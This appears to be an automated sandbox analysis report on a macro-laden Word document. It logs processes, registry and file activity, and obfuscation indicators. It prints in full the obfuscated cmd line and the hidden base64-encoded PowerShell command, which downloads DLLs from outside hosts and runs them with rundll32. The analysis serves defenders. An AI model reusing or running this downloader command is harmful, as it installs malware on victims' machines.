jACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzUJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFYJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRaeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2099358220.000000001B830000.00000002.00000001.sdmp
                      Source: 79a2gzs3gkk.docInitial sample: OLE summary subject = Central ROI payment Planner Money Market Account azure Metal value-added Latvia next-generation algorithm

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: 79a2gzs3gkk.docStream path 'Macros/VBA/X1bqz0qaer43b52bf' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module X1bqz0qaer43b52bfName: X1bqz0qaer43b52bf
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: 79a2gzs3gkk.docStream path 'Macros/VBA/X1bqz0qaer43b52bf' : High number of string operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module X1bqz0qaer43b52bfName: X1bqz0qaer43b52bf
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJ